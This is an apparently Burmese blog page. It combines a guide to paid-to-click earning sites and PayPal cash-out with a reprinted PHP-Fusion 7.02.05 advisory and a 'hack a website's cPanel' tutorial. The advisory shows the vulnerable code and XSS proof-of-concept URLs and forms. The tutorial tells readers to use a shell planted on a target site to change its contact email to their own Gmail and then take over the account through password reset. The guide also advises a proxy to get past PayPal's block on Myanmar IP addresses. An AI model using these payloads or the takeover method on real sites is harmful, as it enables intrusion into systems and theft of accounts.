၄င္းဟာ ဘာကိုညႊန္းတာလဲဆိုေတာ့ ဥပမာ ကိုယ္ကျမန္မာႏိုင္ငံကေန  အေကာင့္လုပ္ ႏွိပ္ေနတယ္။  ႏိုင္ငံျခား ေရာက္သြားရင္လည္း   ဒီဆိုဒ္ကို အသံုးျပဳႏိုင္တဲ့သေဘာပါ။  ဒါေၾကာင့္လက္ခံတာပါ။  ဘာေၾကာင့္ေျပာတာလဲဆိုေတာ့   တစ္ႏိုင္ငံနဲ႔တစ္ႏိုင္ငံဟာ အိုင္ပီနံပါတ္မ်ားမတူသလို  အခ်ိန္မ်ားလည္း မတူညီၾကပါ။ ဒါေပမယ့္ ျမန္မာႏိုင္ငံ ကေန ပိုက္ဆံ ထုတ္ ၿပီဆိုရင္ေတာ့ proxy ေက်ာ္ကိုေက်ာ္ရမွာပါ။ ဘာေၾကာင့္လဲဆိုေတာ့ Cyber Banking ျဖစ္တဲ့ Paypal က ကၽြန္ေတာ္တို႔ ျမန္မာ IP address နဲ႔ ခြင့္မွ မျပဳတာ။

(ေအာက္မွာ Paypal Account ဖြင့္ နည္း ႏွင့္ မိမိ လက္ထဲ ပိုက္ဆံ ရေအာင္ထုတ္ နည္းကို ျပည့္ျပည့္ စံုစံု ေဖာ္ျပေပးသြားပါမည္။)

အလိုအေလ်ာက္ႏွိပ္ေသာ ေဆာ့ဖ္ဝဲအသံုးျပဳျခင္းကို လက္မခံျခင္း

အခ်ိဳ႕ေသာ ကိုယ္တိုင္ႏွိပ္ရမွာပ်င္းတဲ့သူမ်ားက  အလိုအေလ်ာက္ႏွိပ္ေပးတဲ့ ေဆာ့ဖ္ဝဲမ်ားကို  အသံုးျပဳၾကပါ တယ္။ ထိုသို႔အသံုးျပဳျခင္းကို PTC Website မ်ားက လက္မခံပါဘူး။ စစ္ေဆးေတြ႔ရွိက အေရးယူျခင္းခံရမွာပါ။

ေငြကို ဘယ္လိုထုတ္မလဲ

အြန္လိုင္းမွာ ေငြေခ်ျခင္း၊ ေငြလႊဲျခင္း၊ ေငြထုတ္ျခင္း စသည္မ်ားကို ျခားခံအေနနဲ႔ ေဆာင္ရြက္ေပးတဲ့Cyber Banking Website မ်ားရွိပါတယ္။ eg : Paypal, Payza or Alertpay, Neteller, Egopay, libertyreserve etc.....
ကၽြန္ေတာ္ ကေတာ့ Paypal ပဲ အသံုးျပဳပါ လို႔ အၾကံေပးခ်င္ပါတယ္။
(Paypal Account ဖြင္းနည္းကို ျပည့္ျပည့္စံုစံု Post တင္ေပးထားပါသည္။)

ေငြကို လက္ထဲေရာက္ေအာင္ ဘယ္လိုထုတ္မလဲ (မသိေသာသူမ်ား အတြက္သာ)

အရင္ ဦဆံုး Paypal မွာ Sign Up လုပ္လိုက္ပါ။ Cyber Banking အက်ိဳးေဆာင္ company မ်ားႏွင့္ ဆက္သြယ္ၿပီး ထုတ္ႏိုင္ပါတယ္။
ဥပမာ။    ။   www.shwemoney.com   တာရွိပါတယ္။ ျမန္မာ Website ပါOnline Banking System  အက်ိဳးေဆာင္Company ပါ။ ေငြလႊဲ ခ ကေတာ့ လႊဲေငြ၏ ၅% ပါ။
        Ph : 01-510-554
        Address : No (9), Shin Saw Pu Pagoda Street(near city mark) Sanchaung Township
        Email : support@shwemoney.com

Startup Now 

 မွက္ခ်က္။     ။signup လုပ္ခ်ိန္တြင္ Paypal email ေနရာတြင္ အဆင္ေျပတဲ့ email တစ္ခုခု (သို႔) ကြပ္လပ္ အတိုင္း ထားလို႔ရပါတယ္။ ၾကိဳက္တဲ့အခ်ိန္ ျပင္လို႔ ရပါတယ္။

1) Neobux



2) ProBux





4) BUXP








PTC Registering (Register ဘယ္္လိုလုပ္္မလဲ)

PTC registering  ကိNEOBUX ႏွင့္ ဥပမာေပး ျပီး ရွင္းျပ ပါ မယ္။
1) ေအာက္ကပံုကိုႏွိပ္လိုက္ပါ...



2)

3)
Paypal Email ေနရာမွာ ၾကိဳက္တဲ့ email ျဖည့္လို႔ ရပါတယ္။ အခ်ိန္မေရြး ေျပာင္းလို႔ ရတယ္။ Paypal Account လည္း ဖြင့္စရာမလိုေသးပါဘူး။ Cash out လုပ္တဲ့အခ်ိန္ေရာက္ မွ Paypal Account ဖြင့္လည္းရပါတယ္။ 
4)

အထပ္ပါပံုမ်ိဳးေတြ႔ရပါက Neobux က သင့္ရဲ့ အီးေမးလိပ္စာကို စာပို႔လိုက္ပါျပီ၊ အဲ့ဒီ့စာထဲမွာ Validation code ပါထည့္ေပးလိုက္တယ္၊ အဲ့ဒီ့ကုတ္ကိုကူးျပီး အထပ္ပါပံုရဲ့ ျမွား  ျပထားတဲ့ေနရာမွာထည့္ေပးရမယ္၊ (ပံုမွန္အားျဖင့္ Neobux မွေပးပို႔ေသာစာမ်ားဟာ သင့္အီးေမးရဲ့ Inbox ထဲမွာမရွိတတ္ပဲ Spam box ထဲေရာက္ေနတတ္ပါတယ္၊ Spam box မွာရွာပါ၊) ေအာပါပံုမွာဥပမာျပထားပါတယ္။


 

  


ဒါဆိုရင္ သင့္ရဲ့ neobux register လုပ္ၿခင္းအစီအစဥ္ ေအာင္ၿမင္စြာ ၿပီးဆံုးပါၿပီ 
ကဲ login သာ လုပ္လိုက္ ပါေတာ့......
Secondary Password က မသံုးလဲ ရပါတယ္။

Neobux ဝင္ေငြရေအာင္ ဘယ္လိုလုပ္မလဲ 

(1) Home page မွာ View Advertisements ကိုႏွိပ္ပါ။
(2) ေၾကာ္ျငာ Link ေတြ ကို click ပါ။ ( Red, Green , Orange)  စသည့္အေရာင္ေတြ ႏွင့္ ေတြရပါ လိမ့္ မယ္။ ကၽြန္ေတာ္ က ႏွိပ္ျပီးသားျဖစ္ေနလို႔ ပါ။
(3) အနီေရာင္ အစက္ေလး ကို ႏွိပ္လိုက္ပါ
(4) Close ကို Click လိုက္ပါ။ ဒါဆိုရင္ ေၾကာ္ျငာ တစ္ခု ၾကည္လို႔ ျပီး သြားပါျပီ။ 
ေၾကာ္ျငာအားလံုး ကုန္ေအာင္ ၾကည့္ လိုက္ပါ။
အားလံုးျပီးသြား ရင္ User name ေပၚေနတဲ့ ေနရာ မွာ click ႏွိပ္လိုက္ပါ။ ခင္ဗ်ား တို႔ရထားတဲ့ ပိုက္ဆံ ေတြ႕ ရပါလိမ့္မယ္။

NEOBUX ကို example ေပးျပီး ပါ ျပီ။ က်န္တာေတြလဲ ထိုနည္း၄င္း ပါဘဲ ။ PTC site ေတြအမ်ားၾကီးပါ ၾကိဳက္တာကို စမ္းၾကည့္ ပါ။ But register မလုပ္ခင္ေတာ့ Forum တို႔ Payment Proof တို႕ကို အရင္ၾကည့္ပါ....... Good luck EVERYBODY

Monday, May 27, 2013

PHP-Fusion 7.02.05 XSS


https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcSHtyiEFujDPkerw0g-JWdVmK35nPnYhLvBlkALg4WY_8dujydcBg 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PHP-Fusion is a light-weight open-source content management system (CMS) written in PHP 5. It utilises a MySQL database to store your site content and includes a simple, comprehensive administration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages.


http://www.php-fusion.co.uk/news.php

http://sourceforge.net/projects/php-fusion/



Vulnerable is version 7.02.05 and possibly older versions.


New, patched version 7.02.06 available here:


http://www.php-fusion.co.uk/news.php?readmore=569

http://www.php-fusion.co.uk/downloads.ph...oad_id=264


Reflected XSS in "forum/viewthread.php"

Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "highlight"
Preconditions:
1. there must exist at least one forum thread

Php script "forum/viewthread.php" line 361:


Code:
// highlight jQuery plugin
    if (isset($_GET['highlight'])) {
        $words = explode(" ", urldecode($_GET['highlight']));
        $higlight = ""; $i = 1; $c_words = count($words);
        foreach ($words as $hlight) {
            $higlight .= "'".$hlight."'";
            $higlight .= ($i < $c_words ? "," : "");
            $i++;
        }
        add_to_head("<script type='text/javascript' src='".INCLUDES."jquery/jquery.highlight.js'></script>");
        $highlight_js .=   "jQuery('.search_result').highlight([".$higlight."],{wordsOnly:true});";
Test (parameter "thread_id" must be valid):

http://localhost/phpfusion70205/forum/viewthread.php?thread_id=20&highlight=%2527]);});alert(123);/*

Reflected XSS in "messages.php"
Reason:
1. uninitialized variables "$user_list" and "$user_types"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "user_list", "user_types"
Preconditions:
1. logged in as user
2. register_globals=on

Php script "messages.php" line 482:
Code:
if ($_GET['msg_send'] == "0") {
    echo "<select name='msg_send' class='textbox'>\n".$user_list."</select>\n";
Test:
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/messages.php?msg_send=0" method="post">
<input type="hidden" name="chk_sendtoall" value="0">
<input type="hidden" name="user_list" value="</select><script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>
Similar problem is related to variable "$user_types", only in this case admin
access level is needed:

Php script "messages.php" line 490:
Code:
if (iADMIN && !isset($_GET['msg_id'])) {
    echo "<label><input name='chk_sendtoall' type='checkbox' ".$sendtoall_chk." />\n";
    echo "".$locale['434'].":</label> <select name='msg_to_group' class='textbox'>\n".$user_types."</select>\n";

Reflected XSS in "infusions/shoutbox_panel/shoutbox_admin.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with shoutbox administration privileges
2. register_globals=on

Php script "infusions/shoutbox_panel/shoutbox_admin.php" line 149:
Code:
if (isset($message) && $message != "") {
echo "<div id='close-message'><div class='admin-message'>".$message."</div></div>\n"; }
Test (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/infusions/shoutbox_panel/shoutbox_admin.php?
aid=e017e24eb00e8ccf&page=settings&message=<body+onload=alert(123);+

Reflected XSS in "administration/news.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with news administration privileges
2. register_globals=on

Php script "administration/news.php" line 31:
Code:
if (isset($_GET['error']) && isnum($_GET['error'])) {
    if ($_GET['error'] == 1) {
        $message = $locale['413'];
...
    if ($message) {    echo "<div id='close-message'>
      <div class='admin-message'>".$message."</div></div>\n"; }
}
if (isset($_GET['status'])) {
    if ($_GET['status'] == "sn") {
        $message = $locale['410'];
...
    if ($message) {    echo "<div id='close-message'>
      <div class='admin-message'>".$message."</div></div>\n"; }
}
Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&error=9&message=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&status=1&message=<body+onload=alert(123);+

Reflected XSS in "administration/panel_editor.php"
Reason:
1. uninitialized variable "$panel_list"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "panel_list"
Preconditions:
1. logged in as admin with panel editing privileges
2. register_globals=on

Php script "administration/panel_editor.php" line 32:
Code:
while ($folder = readdir($temp)) {
    if (!in_array($folder, array(".","..")) && strstr($folder, "_panel")) {
        if (is_dir(INFUSIONS.$folder)) $panel_list[] = $folder;
    }
}
...
for ($i=0;$i < count($panel_list);$i++) {
        echo "<option".($panel_filename == $panel_list[$i] ?
            " selected='selected'" : "").">".$panel_list[$i]."</option>\n";
Test (parameter "aid" needs to be valid):
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/panel_editor.php?aid=e017e24eb00e8ccf" method="post">
<input type="hidden" name="panel_list[]" value="<script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>

Reflected XSS in "administration/phpinfo.php"
Reason: insufficient sanitization of html output
Attack vector: User-Agent string
Preconditions:
1. logged in as admin with php info view privileges

Php script "administration/phpinfo.php" line 46:
Code:
$phpinfo .= "<tr>\n<td class='tbl2' style='width:20%'>".$locale['410']."</td>
<td class='tbl1' style='text-align:right'>".$_SERVER['HTTP_USER_AGENT']."</td></tr>\n";

Reflected XSS in "administration/bbcodes.php"
Reason:
1. uninitialized variable "$__BBCODE__"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "__BBCODE__"
Preconditions:
1. logged in as admin with bbcode settings change privileges
2. register_globals=on

Php script "administration/bbcodes.php" line 141:
Code:
echo "<td class='$cls'>".$__BBCODE__[0]['description']."</td>\n";
echo "<td class='$cls'>".$__BBCODE__[0]['usage']."</td>\n";

Test (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][description]=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][usage]=<body+onload=alert(123);+

Reflected XSS in multiple admin scripts, affected parameter "errorMessage"
Reason:
1. uninitialized variables "$error" and "$errorMessage"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "error" and "errorMessage"
Preconditions:
1. logged in as admin with appropriate privileges
2. register_globals=on

Php script "administration/article_cats.php" line 110:
Code:
if (isset($error) && isnum($error)) {
        if ($error == 1) {
            $errorMessage = $locale['460'];
        } elseif ($error == 2) {
            $errorMessage = $locale['461'];
        }
        if ($errorMessage) { echo "<div id='close-message'>
          <div class='admin-message'>".$errorMessage."</div></div>\n"; }

The same vulnerability exists in four different admin scripts:

1. administration/article_cats.php
2. administration/download_cats.php
3. administration/news_cats.php
4. administration/weblink_cats.php

Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/article_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/download_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/weblink_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

Reflected XSS in "administration/articles.php"
Reason: insufficient sanitization of html output
Attack vector: user-supplied POST parameters "body" and "body2"
Preconditions:
1. logged in as admin with articles administration privileges

Php script "administration/articles.php" line 70:
Code:
$bodypreview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body']));
$body2preview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body2']));
...
echo $bodypreview."\n";
...
echo $body2preview."\n";
Test (parameter "aid" needs to be valid):

Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/articles.php?aid=0ebd6f54040890e8" method="post">
<input type="hidden" name="preview" value="1">
<input type="hidden" name="body" value="<script>alert(123);</script>">
<input type="hidden" name="body2" value="<script>alert(321);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>

Website တစ္ခုရဲ ့ Cpanel ကို အလြယ္ဆုံးနည္းနဲ ့ Hack မယ္

https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTpvpLk9QKQ7RnxtT1UyXZgokwqiubRmGXeryZiGoOu1Gr-zDK6



ခုနည္းကို သုံးမယ္ဆုိရင္ေတာ့ အရင္ဆုံး မိမိ Hack
လုပ္ခ်င္တဲ့ ဆုိဒ္မွာ Shell တင္ထားဖုိ ့လုိပါတယ္။
ျပီးသြားရင္ Shell မွ ပတ္လမ္းတစ္ခုၾကည့္ရပါမယ္..
. အဲ့မွာ /home/user/public_html/
ဆုိတာရွိပါတယ္ ..
 ေအာက္ပုံလုိမ်ဳိးေပ့ါ..

http://img855.imageshack.us/img855/8901/lgtce2a.png
ဒီမွာေတာ့ /home/user/Public_html/ အစား /home/fortun03/public_html/ လုိ ့ျဖစ္ေနပါတယ္..
ဆုိလုိခ်င္တာကေတာ့ /user/ ဆုိတဲ့ေနရာမွာ website Db List name ျဖစ္ေနမွာပါ..(တစ္ဆုိဒ္နဲ ့တစ္ဆုိဒ္ မတူဘူးေပ့ါဗ်ာ။) ဒီေတာ့ အဲ့ /user/ ကုိ ကလစ္နုိပ္ရပါမယ္။ ဒီေတာ့ /home/user/ လုိ ့ျဖစ္သြားပါမယ္။
ကြ်န္ေတာ္ပုံမွာကေတာ့ /home/fortun03/ လုိ ့ျဖစ္သြားမယ္ေပ့ါဗ်ာ... တစ္ခုနဲ ့တစ္ခု မတူလုိ ့ပါ။
ေအာက္ကပုံေလးဆက္ၾကည့္ပါအုံး..


http://i.imgur.com/IbTKgOZ.png





 အဲ့မွာ.. .contactemail ဆိုတာ ပါပါ တယ္.. အဲ့တည္းကို ၀င္ရပါမယ္...
ပုံေတြ က ေသးထားတယ္ဗ်ာ.. ကြန္န၇ွင္ မေကာင္းတဲ့သူေတြ အဆင္ေျပေအာင္ပါ... မျမင္ရဘူးထင္ရင္ Ctrl ကို ဖိထားျပီး Mouse မွ ဘီးေလးကို ေရွ  ့တုိး ေနာက္ဆုတ္ လုပ္ျပီး ၾကည့္နုိင္ပါတယ္...
ကဲဆက္လုိက္မယ္... အဲ့ contactemail ဆုိတဲ့ ဖုိင္တည္း၀င္လုိက္ရင္ေအာက္ကလုိ မ်ဳိးလင့္ကိုျမင္ရပါမယ္.
http://img11.imageshack.us/img11/2372/lgt4eb1.png

ပုံတည္းမွာျမင္ရသလုိ Gmail လိပ္စာတစ္ခုကို ျမင္ရမွာျဖစ္ပါတယ္...
အဲ့လိပ္စာေနရာကို သင့္ G-Mail လိပ္စာလည့္ျပီး save လုပ္လုိက္ပါ..
ျပီးရင္ Host ကိုသြားျပီး Forgot password ကေန သြားလုပ္ရင္ သင္ G-Mail တည္းကို Password Restart code ကေရာက္လာမွာျဖစ္ပါတယ္..
ကဲ ဒီေလာက္ဆုိ အဆင္ေျပေလာက္မယ္ထင္ပါတယ္...
မေျပလည္း ဦးေႏွာက္နည္းနည္းသုံးျပီးစဥ္းစားလုိက္ပါ.. သူမ်ားက ဒါဆုိ ဒါ ျဖစ္ေနတဲ့ ဘ၀မ်ဳိးကုိထားခဲ့ျပီး ကို ့ လမ္းကုိ ေရႊး ျပီး ကုိ ့အေတြး ကို ခ်ဲ  ့ ေစခ်င္ပါျပီ...

Credit : Min Soe Yar Sar

Free Backlinks
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Affiliate Network Reviews